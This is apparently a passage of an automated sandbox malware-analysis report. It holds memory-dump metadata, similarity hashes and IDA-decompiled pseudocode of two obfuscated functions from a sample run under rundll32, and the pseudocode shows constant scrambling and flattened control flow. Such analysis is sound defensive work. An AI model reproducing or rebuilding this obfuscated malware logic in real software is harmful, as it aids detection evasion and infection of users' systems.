                                                                                                                      0x002c166b
                                                                                                                      0x002c166e
                                                                                                                      0x00000000
                                                                                                                      0x002c15c5
                                                                                                                      0x002c15cb
                                                                                                                      0x002c1647
                                                                                                                      0x002c164c
                                                                                                                      0x002c164f
                                                                                                                      0x00000000
                                                                                                                      0x002c15cd
                                                                                                                      0x002c15d3
                                                                                                                      0x002c1631
                                                                                                                      0x002c1636
                                                                                                                      0x002c1639
                                                                                                                      0x00000000
                                                                                                                      0x002c15d5
                                                                                                                      0x002c15db
                                                                                                                      0x002c1616
                                                                                                                      0x002c161b
                                                                                                                      0x002c161e
                                                                                                                      0x00000000
                                                                                                                      0x002c15dd
                                                                                                                      0x002c15e3
                                                                                                                      0x00000000
                                                                                                                      0x002c15e9
                                                                                                                      0x002c15f8
                                                                                                                      0x002c15fd
                                                                                                                      0x002c1600
                                                                                                                      0x00000000
                                                                                                                      0x002c1600
                                                                                                                      0x002c15e3
                                                                                                                      0x002c15db
                                                                                                                      0x002c15d3
                                                                                                                      0x002c15cb
                                                                                                                      0x002c15bf
                                                                                                                      0x002c1774
                                                                                                                      0x002c1776
                                                                                                                      0x002c177a
                                                                                                                      0x002c177a
                                                                                                                      0x002c1784
                                                                                                                      0x002c1784
                                                                                                                      0x002c1678
                                                                                                                      0x002c167e
                                                                                                                      0x002c173d
                                                                                                                      0x002c1742
                                                                                                                      0x002c1745
                                                                                                                      0x00000000
                                                                                                                      0x002c1684
                                                                                                                      0x002c1684
                                                                                                                      0x002c168a
                                                                                                                      0x002c171c
                                                                                                                      0x002c1721
                                                                                                                      0x002c1724
                                                                                                                      0x00000000
                                                                                                                      0x002c168c
                                                                                                                      0x002c168c
                                                                                                                      0x002c1692
                                                                                                                      0x002c16fc
                                                                                                                      0x002c16ff
                                                                                                                      0x00000000
                                                                                                                      0x002c1694
                                                                                                                      0x002c1694
                                                                                                                      0x002c1696
                                                                                                                      0x002c16e3
                                                                                                                      0x002c16e8
                                                                                                                      0x002c16eb
                                                                                                                      0x00000000
                                                                                                                      0x002c1698
                                                                                                                      0x002c1698
                                                                                                                      0x002c169e
                                                                                                                      0x00000000
                                                                                                                      0x002c16a4
                                                                                                                      0x002c16b0
                                                                                                                      0x002c16b1
                                                                                                                      0x002c16b5
                                                                                                                      0x002c16ba
                                                                                                                      0x002c16be
                                                                                                                      0x002c16c0
                                                                                                                      0x002c16c6
                                                                                                                      0x00000000
                                                                                                                      0x002c16c6
                                                                                                                      0x002c16c0
                                                                                                                      0x002c169e
                                                                                                                      0x002c1696
                                                                                                                      0x002c1692
                                                                                                                      0x002c168a
                                                                                                                      0x00000000
                                                                                                                      0x002c174a
                                                                                                                      0x002c174a
                                                                                                                      0x002c174a
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Fax%$gU$$F$T$^#$^#
                                                                                                                      • API String ID: 0-2311862416
                                                                                                                      • Opcode ID: ec0ed06aba5dba57669efc6d06ae299f3cdbf4a225dd5178920b32f9c929715b
                                                                                                                      • Instruction ID: 7b0e723dd6f560f3b2b5a1b4beb8cf07a61b5ac1f3e6aa40b5016abe1746bb0d
                                                                                                                      • Opcode Fuzzy Hash: ec0ed06aba5dba57669efc6d06ae299f3cdbf4a225dd5178920b32f9c929715b
                                                                                                                      • Instruction Fuzzy Hash: 6BC163714287419FC768CF24C88A91FBBE2FBD5758F504A1CF2864A261D3B18969CF83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002C363D Relevance: 7.8, Strings: 6, Instructions: 259COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 74%
                                                                                                                      			E002C363D(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a28) {
				intOrPtr _v60;
				char _v68;
				char _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				char _t264;
				signed int _t295;
				signed int _t298;
				signed int _t299;
				signed int _t300;
				signed int _t301;
				signed int _t302;
				signed int _t303;
				signed int _t304;
				void* _t307;
				void* _t308;
				void* _t334;
				intOrPtr _t335;
				signed int* _t338;

				_push(_a28);
				_t334 = __ecx;
				_push(0);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(__ecx);
				_t264 = E002BCF25(0);
				_v72 = _t264;
				_t335 = _t264;
				_v124 = 0xc44be;
				_t338 =  &(( &_v176)[9]);
				_v124 = _v124 + 0xffff24c4;
				_t307 = 0xc36eaf9;
				_t298 = 0x37;
				_v124 = _v124 * 0x2e;
				_v124 = _v124 ^ 0x020cf15c;
				_v176 = 0xedca77;
				_v176 = _v176 * 0x1f;
				_v176 = _v176 << 4;
				_v176 = _v176 + 0xdbf9;
				_v176 = _v176 ^ 0xccb922a9;
				_v120 = 0x5a606;
				_v120 = _v120 | 0xc9e49228;
				_t299 = 0x62;
				_v120 = _v120 / _t298;
				_v120 = _v120 ^ 0x03ad0d8c;
				_v144 = 0x918442;
				_v144 = _v144 >> 0xd;
				_v144 = _v144 * 0x3e;
				_v144 = _v144 + 0xa3d5;
				_v144 = _v144 ^ 0x0007140c;
				_v88 = 0x37923f;
				_v88 = _v88 ^ 0x32449291;
				_v88 = _v88 ^ 0x3276c44e;
				_v168 = 0xa5175f;
				_v168 = _v168 + 0x6cd0;
				_v168 = _v168 >> 0xd;
				_v168 = _v168 + 0x50d;
				_v168 = _v168 ^ 0x000b28ed;
				_v96 = 0x8bb9e8;
				_v96 = _v96 ^ 0x9313002a;
				_v96 = _v96 ^ 0x93929827;
				_v128 = 0x9b97bd;
				_v128 = _v128 >> 9;
				_v128 = _v128 + 0x506c;
				_v128 = _v128 ^ 0x0008f405;
				_v136 = 0x162b;
				_v136 = _v136 << 0xe;
				_v136 = _v136 ^ 0xcbe41246;
				_v136 = _v136 ^ 0xce6e1682;
				_v160 = 0xb72d70;
				_v160 = _v160 >> 8;
				_v160 = _v160 ^ 0x815bd7a2;
				_v160 = _v160 ^ 0x177336f3;
				_v160 = _v160 ^ 0x962c98d3;
				_v100 = 0xe545e5;
				_v100 = _v100 + 0xffffaae8;
				_v100 = _v100 | 0x514a639c;
				_v100 = _v100 ^ 0x51eea269;
				_v152 = 0xd9d32c;
				_v152 = _v152 >> 8;
				_v152 = _v152 ^ 0x78b07b8d;
				_v152 = _v152 / _t299;
				_v152 = _v152 ^ 0x01343475;
				_v92 = 0x6219a9;
				_v92 = _v92 << 8;
				_v92 = _v92 ^ 0x6210c938;
				_v80 = 0x3ff2a1;
				_v80 = _v80 + 0xffff7ea3;
				_v80 = _v80 ^ 0x003f2f73;
				_v164 = 0xe5565b;
				_v164 = _v164 + 0xffff5b62;
				_t300 = 0x78;
				_v164 = _v164 * 6;
				_v164 = _v164 / _t300;
				_v164 = _v164 ^ 0x000727eb;
				_v76 = 0x250d2;
				_v76 = _v76 | 0x8f851c12;
				_v76 = _v76 ^ 0x8f8220e2;
				_v116 = 0x568e;
				_v116 = _v116 ^ 0x3d61f204;
				_v116 = _v116 << 7;
				_v116 = _v116 ^ 0xb0d54eba;
				_v172 = 0xa5a4a3;
				_v172 = _v172 | 0xd2f7b266;
				_v172 = _v172 >> 0xd;
				_t301 = 0x7f;
				_v172 = _v172 * 0x30;
				_v172 = _v172 ^ 0x0132b547;
				_v112 = 0xd0329d;
				_v112 = _v112 * 0x58;
				_v112 = _v112 << 3;
				_v112 = _v112 ^ 0x3c81866c;
				_v104 = 0x844e69;
				_v104 = _v104 << 0xc;
				_v104 = _v104 >> 4;
				_v104 = _v104 ^ 0x0443b556;
				_v84 = 0x1d6374;
				_v84 = _v84 >> 0xd;
				_v84 = _v84 ^ 0x000df0de;
				_v148 = 0x6585fd;
				_v148 = _v148 / _t301;
				_t302 = 0x77;
				_v148 = _v148 / _t302;
				_v148 = _v148 >> 0xa;
				_v148 = _v148 ^ 0x000a9d1a;
				_v156 = 0xff5a31;
				_v156 = _v156 + 0xce45;
				_t303 = 0x29;
				_v156 = _v156 / _t303;
				_v156 = _v156 << 1;
				_v156 = _v156 ^ 0x0008392b;
				_v132 = 0x13d5b5;
				_v132 = _v132 << 0x10;
				_v132 = _v132 + 0xffff95f7;
				_v132 = _v132 ^ 0xd5b1b27f;
				_v108 = 0x3556bb;
				_v108 = _v108 * 0x4f;
				_v108 = _v108 + 0xffff90f3;
				_v108 = _v108 ^ 0x10791788;
				_v140 = 0x81de0d;
				_t304 = 0x6d;
				_v140 = _v140 / _t304;
				_v140 = _v140 + 0xf4b;
				_v140 = _v140 * 0x26;
				_v140 = _v140 ^ 0x002a9917;
				do {
					while(_t307 != 0x688d2d5) {
						if(_t307 == 0x8a4f536) {
							_t295 = E002C5B0E(_a28, _v120,  &_v72, _v144);
							_t338 =  &(_t338[3]);
							__eflags = _t295;
							if(_t295 != 0) {
								_t307 = 0x688d2d5;
								continue;
							}
						} else {
							if(_t307 == 0x94a3104) {
								E002B6E34(_v132, _v72, _v108, _v140);
							} else {
								if(_t307 != 0xc36eaf9) {
									goto L9;
								} else {
									_t307 = 0x8a4f536;
									continue;
								}
							}
						}
						L12:
						return _t335;
					}
					_push(_v128);
					_push(_v96);
					_push(_v168);
					_push(_v88);
					_t308 = 0x44;
					E002D1310(_t308,  &_v68);
					_push(_v152);
					_v68 = 0x44;
					_push(_v100);
					_t309 = _v136;
					_push(0x2b1800);
					_v60 = E002BAB66(_v136, _v160, __eflags);
					__eflags = _v176 | _v124;
					_t335 = E002CC8BD(_v92, _v136, _v80, _v136, _t309, _v164, _v76, _a20, _v116, _t334, _a28, _v172, _v176 | _v124, 0, _v112,  &_v68, _v72, _v104);
					E002BAE03(_v84, _v148, _v156, _v60);
					_t338 =  &(_t338[0x1a]);
					_t307 = 0x94a3104;
					L9:
					__eflags = _t307 - 0xce6287b;
				} while (_t307 != 0xce6287b);
				goto L12;
			}














































                                                                                                                      0x002c3647
                                                                                                                      0x002c3650
                                                                                                                      0x002c3652
                                                                                                                      0x002c3653
                                                                                                                      0x002c365a
                                                                                                                      0x002c3661
                                                                                                                      0x002c3668
                                                                                                                      0x002c366f
                                                                                                                      0x002c3676
                                                                                                                      0x002c3677
                                                                                                                      0x002c3678
                                                                                                                      0x002c367d
                                                                                                                      0x002c3684
                                                                                                                      0x002c3686
                                                                                                                      0x002c368e
                                                                                                                      0x002c3691
                                                                                                                      0x002c36a0
                                                                                                                      0x002c36a7
                                                                                                                      0x002c36aa
                                                                                                                      0x002c36ae
                                                                                                                      0x002c36b6
                                                                                                                      0x002c36c3
                                                                                                                      0x002c36c7
                                                                                                                      0x002c36cc
                                                                                                                      0x002c36d4
                                                                                                                      0x002c36dc
                                                                                                                      0x002c36e4
                                                                                                                      0x002c36f2
                                                                                                                      0x002c36f3
                                                                                                                      0x002c36f7
                                                                                                                      0x002c36ff
                                                                                                                      0x002c3707
                                                                                                                      0x002c3711
                                                                                                                      0x002c3715
                                                                                                                      0x002c371d
                                                                                                                      0x002c3725
                                                                                                                      0x002c372d
                                                                                                                      0x002c3735
                                                                                                                      0x002c373d
                                                                                                                      0x002c3745
                                                                                                                      0x002c374d
                                                                                                                      0x002c3752
                                                                                                                      0x002c375a
                                                                                                                      0x002c3762
                                                                                                                      0x002c376a
                                                                                                                      0x002c3772
                                                                                                                      0x002c377a
                                                                                                                      0x002c3782
                                                                                                                      0x002c3787
                                                                                                                      0x002c378f
                                                                                                                      0x002c3797
                                                                                                                      0x002c379f
                                                                                                                      0x002c37a4
                                                                                                                      0x002c37ac
                                                                                                                      0x002c37b4
                                                                                                                      0x002c37bc
                                                                                                                      0x002c37c1
                                                                                                                      0x002c37c9
                                                                                                                      0x002c37d1
                                                                                                                      0x002c37d9
                                                                                                                      0x002c37e1
                                                                                                                      0x002c37e9
                                                                                                                      0x002c37f1
                                                                                                                      0x002c37f9
                                                                                                                      0x002c3801
                                                                                                                      0x002c3806
                                                                                                                      0x002c3818
                                                                                                                      0x002c381e
                                                                                                                      0x002c3826
                                                                                                                      0x002c382e
                                                                                                                      0x002c3833
                                                                                                                      0x002c383b
                                                                                                                      0x002c3843
                                                                                                                      0x002c384b
                                                                                                                      0x002c3853
                                                                                                                      0x002c385b
                                                                                                                      0x002c3868
                                                                                                                      0x002c386b
                                                                                                                      0x002c3877
                                                                                                                      0x002c387b
                                                                                                                      0x002c3883
                                                                                                                      0x002c388b
                                                                                                                      0x002c3893
                                                                                                                      0x002c389b
                                                                                                                      0x002c38a3
                                                                                                                      0x002c38ab
                                                                                                                      0x002c38b0
                                                                                                                      0x002c38b8
                                                                                                                      0x002c38c0
                                                                                                                      0x002c38c8
                                                                                                                      0x002c38d2
                                                                                                                      0x002c38d5
                                                                                                                      0x002c38d9
                                                                                                                      0x002c38e1
                                                                                                                      0x002c38ee
                                                                                                                      0x002c38f2
                                                                                                                      0x002c38f7
                                                                                                                      0x002c38ff
                                                                                                                      0x002c3907
                                                                                                                      0x002c390c
                                                                                                                      0x002c3911
                                                                                                                      0x002c3919
                                                                                                                      0x002c3921
                                                                                                                      0x002c3926
                                                                                                                      0x002c392e
                                                                                                                      0x002c393e
                                                                                                                      0x002c3946
                                                                                                                      0x002c394b
                                                                                                                      0x002c3951
                                                                                                                      0x002c3956
                                                                                                                      0x002c395e
                                                                                                                      0x002c3966
                                                                                                                      0x002c3972
                                                                                                                      0x002c3975
                                                                                                                      0x002c3979
                                                                                                                      0x002c397d
                                                                                                                      0x002c3985
                                                                                                                      0x002c398d
                                                                                                                      0x002c3992
                                                                                                                      0x002c399a
                                                                                                                      0x002c39a2
                                                                                                                      0x002c39af
                                                                                                                      0x002c39b3
                                                                                                                      0x002c39bb
                                                                                                                      0x002c39c3
                                                                                                                      0x002c39d8
                                                                                                                      0x002c39e0
                                                                                                                      0x002c39e4
                                                                                                                      0x002c39f1
                                                                                                                      0x002c39f5
                                                                                                                      0x002c39fd
                                                                                                                      0x002c39fd
                                                                                                                      0x002c3a03
                                                                                                                      0x002c3a35
                                                                                                                      0x002c3a3a
                                                                                                                      0x002c3a3d
                                                                                                                      0x002c3a3f
                                                                                                                      0x002c3a45
                                                                                                                      0x00000000
                                                                                                                      0x002c3a45
                                                                                                                      0x002c3a05
                                                                                                                      0x002c3a0b
                                                                                                                      0x002c3b31
                                                                                                                      0x002c3a11
                                                                                                                      0x002c3a17
                                                                                                                      0x00000000
                                                                                                                      0x002c3a1d
                                                                                                                      0x002c3a1d
                                                                                                                      0x00000000
                                                                                                                      0x002c3a1d
                                                                                                                      0x002c3a17
                                                                                                                      0x002c3a0b
                                                                                                                      0x002c3b39
                                                                                                                      0x002c3b44
                                                                                                                      0x002c3b44
                                                                                                                      0x002c3a49
                                                                                                                      0x002c3a54
                                                                                                                      0x002c3a58
                                                                                                                      0x002c3a5c
                                                                                                                      0x002c3a62
                                                                                                                      0x002c3a63
                                                                                                                      0x002c3a68
                                                                                                                      0x002c3a6c
                                                                                                                      0x002c3a77
                                                                                                                      0x002c3a7f
                                                                                                                      0x002c3a83
                                                                                                                      0x002c3a90
                                                                                                                      0x002c3aac
                                                                                                                      0x002c3af2
                                                                                                                      0x002c3b03
                                                                                                                      0x002c3b08
                                                                                                                      0x002c3b0b
                                                                                                                      0x002c3b10
                                                                                                                      0x002c3b10
                                                                                                                      0x002c3b10
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: *$D$[V$lP$s/?$E
                                                                                                                      • API String ID: 0-4039435091
                                                                                                                      • Opcode ID: df1b61ba840b9f203b8027a3a0a85c57521a2966b6fe6dd2b0946220639c4ced
                                                                                                                      • Instruction ID: 836c812cfb9d6c85692b5048689dcdbd6b28eb2e02899b10f52c25a38ea6f5e3
                                                                                                                      • Opcode Fuzzy Hash: df1b61ba840b9f203b8027a3a0a85c57521a2966b6fe6dd2b0946220639c4ced
                                                                                                                      • Instruction Fuzzy Hash: 97C13F715083809FD364CF64C98AA1BFBE1FBD8748F609A1DF69586260C7B58958CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002B88F4 Relevance: 7.7, Strings: 6, Instructions: 235COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 90%
                                                                                                                      			E002B88F4(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _t258;
				signed int _t271;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				void* _t303;
				void* _t304;
				signed int* _t307;

				_t307 =  &_v1668;
				_v1644 = 0x34739e;
				_v1644 = _v1644 * 0x43;
				_t303 = __ecx;
				_v1644 = _v1644 >> 0xb;
				_t304 = 0x422d362;
				_t271 = 0x7d;
				_v1644 = _v1644 / _t271;
				_v1644 = _v1644 ^ 0x00084d9c;
				_v1612 = 0xb20ebf;
				_v1612 = _v1612 << 0xe;
				_v1612 = _v1612 ^ 0x83a04dde;
				_v1580 = 0xaa66ba;
				_v1580 = _v1580 + 0xffff0111;
				_v1580 = _v1580 ^ 0x00ac31ef;
				_v1604 = 0x4a91ac;
				_v1604 = _v1604 | 0x86032005;
				_v1604 = _v1604 ^ 0x86453654;
				_v1660 = 0x3cdcbf;
				_t272 = 0x34;
				_v1660 = _v1660 / _t272;
				_v1660 = _v1660 << 9;
				_t273 = 0x19;
				_v1660 = _v1660 * 0x33;
				_v1660 = _v1660 ^ 0x776ddfce;
				_v1620 = 0xfdfe87;
				_v1620 = _v1620 | 0x8debc5e9;
				_v1620 = _v1620 ^ 0x8df4241a;
				_v1596 = 0xc5e4de;
				_v1596 = _v1596 / _t273;
				_v1596 = _v1596 ^ 0x000ab9e2;
				_v1568 = 0x4c47da;
				_v1568 = _v1568 + 0x5d3c;
				_v1568 = _v1568 ^ 0x0043a9f3;
				_v1564 = 0xed5f6a;
				_t274 = 0x2a;
				_v1564 = _v1564 / _t274;
				_v1564 = _v1564 ^ 0x00049b09;
				_v1588 = 0xe27f75;
				_t275 = 0x68;
				_v1588 = _v1588 * 0x15;
				_v1588 = _v1588 ^ 0x129f57f0;
				_v1572 = 0x58913e;
				_v1572 = _v1572 + 0xffff0520;
				_v1572 = _v1572 ^ 0x005b93ab;
				_v1648 = 0xac4e73;
				_v1648 = _v1648 >> 8;
				_v1648 = _v1648 >> 0x10;
				_v1648 = _v1648 << 3;
				_v1648 = _v1648 ^ 0x000ac3bf;
				_v1668 = 0x5a6a4e;
				_t90 =  &_v1668; // 0x5a6a4e
				_v1668 =  *_t90 * 0x58;
				_t92 =  &_v1668; // 0x5a6a4e
				_v1668 =  *_t92 / _t275;
				_v1668 = _v1668 << 1;
				_v1668 = _v1668 ^ 0x009738dd;
				_v1640 = 0x7a6607;
				_t276 = 0x65;
				_v1640 = _v1640 * 0xa;
				_v1640 = _v1640 >> 9;
				_v1640 = _v1640 | 0xf246f931;
				_v1640 = _v1640 ^ 0xf242cc5d;
				_v1628 = 0xa390c8;
				_v1628 = _v1628 << 0xf;
				_v1628 = _v1628 ^ 0x3ac7d651;
				_v1628 = _v1628 ^ 0xf2afedad;
				_v1652 = 0x2d980b;
				_v1652 = _v1652 * 0x71;
				_v1652 = _v1652 * 0x17;
				_v1652 = _v1652 ^ 0x28f4da4d;
				_v1652 = _v1652 ^ 0xe6141d35;
				_v1636 = 0x37785c;
				_v1636 = _v1636 + 0xffffcffd;
				_v1636 = _v1636 ^ 0x6b7d5c73;
				_v1636 = _v1636 ^ 0x6b457d84;
				_v1616 = 0xb1620;
				_v1616 = _v1616 << 0x10;
				_v1616 = _v1616 ^ 0x162b8e46;
				_v1632 = 0x4c47;
				_v1632 = _v1632 + 0xffffc0f0;
				_v1632 = _v1632 + 0xffffd3bf;
				_v1632 = _v1632 ^ 0xfff44e1b;
				_v1664 = 0xa6b80c;
				_v1664 = _v1664 + 0xf763;
				_v1664 = _v1664 * 0x6e;
				_v1664 = _v1664 / _t276;
				_v1664 = _v1664 ^ 0x00b9c638;
				_v1600 = 0xaa0054;
				_v1600 = _v1600 ^ 0xf2e3595a;
				_v1600 = _v1600 ^ 0xf24e3ce3;
				_v1608 = 0x669547;
				_v1608 = _v1608 + 0xe3ee;
				_v1608 = _v1608 ^ 0x0066aeed;
				_v1656 = 0xf50b8d;
				_v1656 = _v1656 + 0xffffe5b9;
				_v1656 = _v1656 * 0x19;
				_v1656 = _v1656 * 0x2c;
				_v1656 = _v1656 ^ 0x1c789090;
				_v1576 = 0xf13773;
				_v1576 = _v1576 | 0xffe45fc0;
				_v1576 = _v1576 ^ 0xfffeb9af;
				_v1624 = 0xc714fc;
				_v1624 = _v1624 << 7;
				_v1624 = _v1624 * 0x4d;
				_v1624 = _v1624 ^ 0xf0acb0c0;
				_v1584 = 0x43b9ac;
				_v1584 = _v1584 + 0xfffff1bc;
				_v1584 = _v1584 ^ 0x004aa621;
				_v1592 = 0x5bf493;
				_t258 = _v1592 * 0x43;
				_v1592 = _t258;
				_v1592 = _v1592 ^ 0x181e9f62;
				while(_t304 != 0x2953b22) {
					if(_t304 == 0x422d362) {
						_t304 = 0xe704baa;
						continue;
					} else {
						_t312 = _t304 - 0xe704baa;
						if(_t304 != 0xe704baa) {
							L8:
							__eflags = _t304 - 0x740d40c;
							if(__eflags != 0) {
								continue;
							}
						} else {
							E002D12A8(_t276, _v1644, _t312, _v1612, _v1580,  &_v1560);
							 *((short*)(E002C4FA8(_v1604,  &_v1560, _v1660, _v1620))) = 0;
							E002B8650(_v1596,  &_v520, _t312, _v1568);
							_push(_v1648);
							_push(_v1572);
							_push(0x2b183c);
							E002BE7CE(E002BAB66(_v1564, _v1588, _t312), _t312, _v1668,  &_v1560, _v1564, _v1640, _v1628, _v1652, _v1636,  &_v520);
							E002BAE03(_v1616, _v1632, _v1664, _t264);
							_t276 = _v1600;
							_t258 = E002CC38F(_t276,  &_v1040, _t303, _v1608);
							_t307 =  &(_t307[0x15]);
							if(_t258 != 0) {
								_t304 = 0x2953b22;
								continue;
							}
						}
					}
					return _t258;
				}
				_push(_v1592);
				_push(_v1584);
				_push(_v1624);
				_push( &_v1040);
				_push(0);
				_push(_v1576);
				_push(_t276);
				_push(0);
				_t276 = 0;
				__eflags = 0;
				_t258 = E002B9700(0, _v1656, 0);
				_t307 =  &(_t307[8]);
				_t304 = 0x740d40c;
				goto L8;
			}











































                                                                                                                      0x002b88f4
                                                                                                                      0x002b88fa
                                                                                                                      0x002b890d
                                                                                                                      0x002b8911
                                                                                                                      0x002b8913
                                                                                                                      0x002b8918
                                                                                                                      0x002b8923
                                                                                                                      0x002b8928
                                                                                                                      0x002b892e
                                                                                                                      0x002b8936
                                                                                                                      0x002b893e
                                                                                                                      0x002b8943
                                                                                                                      0x002b894b
                                                                                                                      0x002b8953
                                                                                                                      0x002b895b
                                                                                                                      0x002b8963
                                                                                                                      0x002b896b
                                                                                                                      0x002b8973
                                                                                                                      0x002b897b
                                                                                                                      0x002b8987
                                                                                                                      0x002b898c
                                                                                                                      0x002b8992
                                                                                                                      0x002b899c
                                                                                                                      0x002b899f
                                                                                                                      0x002b89a3
                                                                                                                      0x002b89ab
                                                                                                                      0x002b89b3
                                                                                                                      0x002b89bb
                                                                                                                      0x002b89c3
                                                                                                                      0x002b89d3
                                                                                                                      0x002b89d7
                                                                                                                      0x002b89df
                                                                                                                      0x002b89e7
                                                                                                                      0x002b89ef
                                                                                                                      0x002b89f7
                                                                                                                      0x002b8a03
                                                                                                                      0x002b8a08
                                                                                                                      0x002b8a0e
                                                                                                                      0x002b8a16
                                                                                                                      0x002b8a23
                                                                                                                      0x002b8a24
                                                                                                                      0x002b8a28
                                                                                                                      0x002b8a30
                                                                                                                      0x002b8a38
                                                                                                                      0x002b8a40
                                                                                                                      0x002b8a48
                                                                                                                      0x002b8a50
                                                                                                                      0x002b8a55
                                                                                                                      0x002b8a5a
                                                                                                                      0x002b8a5f
                                                                                                                      0x002b8a67
                                                                                                                      0x002b8a6f
                                                                                                                      0x002b8a74
                                                                                                                      0x002b8a78
                                                                                                                      0x002b8a7e
                                                                                                                      0x002b8a82
                                                                                                                      0x002b8a86
                                                                                                                      0x002b8a90
                                                                                                                      0x002b8aa9
                                                                                                                      0x002b8aaa
                                                                                                                      0x002b8aae
                                                                                                                      0x002b8ab3
                                                                                                                      0x002b8abb
                                                                                                                      0x002b8ac3
                                                                                                                      0x002b8acb
                                                                                                                      0x002b8ad0
                                                                                                                      0x002b8ad8
                                                                                                                      0x002b8ae0
                                                                                                                      0x002b8aed
                                                                                                                      0x002b8af6
                                                                                                                      0x002b8afa
                                                                                                                      0x002b8b02
                                                                                                                      0x002b8b0a
                                                                                                                      0x002b8b12
                                                                                                                      0x002b8b1a
                                                                                                                      0x002b8b22
                                                                                                                      0x002b8b2a
                                                                                                                      0x002b8b32
                                                                                                                      0x002b8b37
                                                                                                                      0x002b8b3f
                                                                                                                      0x002b8b47
                                                                                                                      0x002b8b4f
                                                                                                                      0x002b8b57
                                                                                                                      0x002b8b5f
                                                                                                                      0x002b8b67
                                                                                                                      0x002b8b74
                                                                                                                      0x002b8b7e
                                                                                                                      0x002b8b82
                                                                                                                      0x002b8b8a
                                                                                                                      0x002b8b92
                                                                                                                      0x002b8b9a
                                                                                                                      0x002b8ba2
                                                                                                                      0x002b8baa
                                                                                                                      0x002b8bb2
                                                                                                                      0x002b8bba
                                                                                                                      0x002b8bc2
                                                                                                                      0x002b8bcf
                                                                                                                      0x002b8bd8
                                                                                                                      0x002b8bdc
                                                                                                                      0x002b8be4
                                                                                                                      0x002b8bec
                                                                                                                      0x002b8bf4
                                                                                                                      0x002b8bfc
                                                                                                                      0x002b8c04
                                                                                                                      0x002b8c0e
                                                                                                                      0x002b8c12
                                                                                                                      0x002b8c1a
                                                                                                                      0x002b8c22
                                                                                                                      0x002b8c2a
                                                                                                                      0x002b8c32
                                                                                                                      0x002b8c3a
                                                                                                                      0x002b8c3f
                                                                                                                      0x002b8c43
                                                                                                                      0x002b8c4b
                                                                                                                      0x002b8c59
                                                                                                                      0x002b8d44
                                                                                                                      0x00000000
                                                                                                                      0x002b8c5f
                                                                                                                      0x002b8c5f
                                                                                                                      0x002b8c61
                                                                                                                      0x002b8d7e
                                                                                                                      0x002b8d7e
                                                                                                                      0x002b8d84
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002b8c67
                                                                                                                      0x002b8c78
                                                                                                                      0x002b8ca5
                                                                                                                      0x002b8cac
                                                                                                                      0x002b8cb1
                                                                                                                      0x002b8cb5
                                                                                                                      0x002b8cca
                                                                                                                      0x002b8d07
                                                                                                                      0x002b8d19
                                                                                                                      0x002b8d22
                                                                                                                      0x002b8d31
                                                                                                                      0x002b8d36
                                                                                                                      0x002b8d3b
                                                                                                                      0x002b8d3d
                                                                                                                      0x00000000
                                                                                                                      0x002b8d3d
                                                                                                                      0x002b8d3b
                                                                                                                      0x002b8c61
                                                                                                                      0x002b8d94
                                                                                                                      0x002b8d94
                                                                                                                      0x002b8d4b
                                                                                                                      0x002b8d56
                                                                                                                      0x002b8d5a
                                                                                                                      0x002b8d5e
                                                                                                                      0x002b8d5f
                                                                                                                      0x002b8d61
                                                                                                                      0x002b8d6c
                                                                                                                      0x002b8d6d
                                                                                                                      0x002b8d6f
                                                                                                                      0x002b8d6f
                                                                                                                      0x002b8d71
                                                                                                                      0x002b8d76
                                                                                                                      0x002b8d79
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
